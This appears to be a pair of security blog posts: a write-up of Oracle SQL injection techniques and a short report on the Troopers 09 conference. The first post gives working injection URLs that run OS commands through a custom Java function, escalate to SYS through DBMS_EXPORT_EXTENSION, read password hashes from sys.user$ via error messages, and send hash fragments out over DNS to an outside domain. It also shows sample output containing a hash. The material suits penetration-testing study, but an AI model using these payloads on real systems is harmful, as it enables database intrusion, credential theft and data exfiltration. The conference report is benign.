www.notsosecure.com

I finally managed to get this working. Just followed the instructions on the website:

http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1
&saveSkin=true&pages=0&replyNum=

These are the 5 steps:
1. create java class
2. give execute permissions on java
3. create function to run cmd
4. grant execute on function to public
5. run the command.

I have copied all the long SQL commands in a text file to make things easier.

An example of command execution is:

http://192.168.172.129:81/ora2.php?name=1%20and%201=
(select%20sys.LinxRunCMD(%27cmd.exe%20/c%20whoami%27)%20from%20dual)

The website also talks about some cool hacks to get the output of the command through OOB channels.

There are a number of privilege escalation attacks known for oracle. These are mainly because by default PL/SQL procedures and functions run with the privilege of the definer and not that of invoker. Think of it like SUID files.

Now, for some reason i was under the impression that these privilege escalations will not be possible through sql injection in web apps. Thats because mostly sql injection occurs in “Select” query and to carry out privilege escalation you need to finish the original statement and then generally write some PL/SQL code and execute it. This requires the web API to support batched query. To the best of my knowledge mostly Web APIs do not support it. Hence, it seemed we would be restricted to extract data with the privileges of the user with which application is connecting to the database.

Alexander told me some attack vectors through which we can execute PL/SQL code without needing the batched query. He has written a small tutorial for this.
The tutorial is still not finished but it gives you a good idea of how to achieve this. While, i still haven’t succeeded in executing O.S commands, i thought i will share the privilege escalation vector:

SQL> select user from dual;

USER
——————————
SCOTT

so, i connect to oracle as user scott and i don’t have privileges to select from sys.user$

SQL> select name, password from sys.user$;
select name, password from sys.user$
*
ERROR at line 1:
ORA-00942: table or view does not exist

Now, i will exploit a web app with sql injection which connects to database as unprivileged user(scott). here i am extracting data with oracle error messages (remember utl_inaddr.get_host_name):

http://192.168.5.109:81/ora2.php?name=-1 and utl_inaddr.get_host_name((select user from dual)) is not null –

and you get an error:
ORA-29257: host SCOTT unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512:

Next, lets try if we can select from sys.user$

http://192.168.5.109:81/ora2.php?name=-1%20and%20utl_inaddr.get_host_name((select%20name||
password%20from%20sys.user$ where rownum=1))%20is%20not%20null%20–

and you get an error similar to what we got earlier:
ORA-00942: table or view does not exist

Oracle’s dbms_export_extension package could be used to execute a block of anonymous Pl/SQL and as it is owned by SYS and executable by PUBLIC, we can use this to execute PL/SQL as SYS user.

So, as per alexander’s example, now we inject this:

http://192.168.5.109:81/ora2.php?name=-1%20
and%20%20chr(44)=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20''DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;
BEGIN%20EXECUTE%20IMMEDIATE%20''''%20select%20user%20from%20dual%20where%20utl_inaddr.get_host_name((select%20name||chr(44)||password%20from%20sys.user$%20where%20rownum=1))%20is%20not%20null'''';END;'';END;--','SYS',0,'1',0)

and you get an error:
ORA-29257: host SYS,286E1EA8F2CFD262 unknown ORA-06512:

So, you have the password hashes..:)

If you like extracting data over dns, here is an example:

http://192.168.5.109:81/ora2.php?name=-1 and chr(44)=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' select user from dual where utl_inaddr.get_host_address((select substr(password,1,10)||chr(46)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(110)||chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)||chr(109) from sys.user$ where rownum=1)) is not null'''';END;'';END;--','SYS',0,'1',0)

You will see name query like this:
16:37:42.734252 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 > x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com.

Alexander will soon update his tutorial and we should be able to execute Operating system commands through web apps.

For more details also refer to page 72 of the “Oracle Hacker’s Handbook”.

I attended troopers 09 in munich and it was a wonderful event. There were some very interesting talks. With regards to web application security, Sandro Gauci & Wendel Guglielmetti Henrique gave a talk on Web Application Firewalls. They also demoed a tool which could passively fingerprint around 10 different WAF. The detection is based on features such as “set-cookie” and “server” HTTP response header etc.
The evasion techniques they mentioned were mostly vendor specific.

Michael Kemp ranted about DLP(Data Loss Prevention) software. His main argument was a DLP software was not any different from a root-kit. He also mentioned that antirootkit vendors do not detect DLP softwares even from another vendor and by changing the endpoints of a DLP software an admin could use the DLP softwares as a perfect rootkit.

I enjoyed the password cracking with GPU’s talk. The talk showed different stats to prove GPU is far more effective and “greener” than CPU. I was expecting some cool demos with play stations cracking passwords, but there were no demos

There were some more interesting talks and the videos will be uploaded soon. Thanks To ERNW for hosting such an enjoyable event.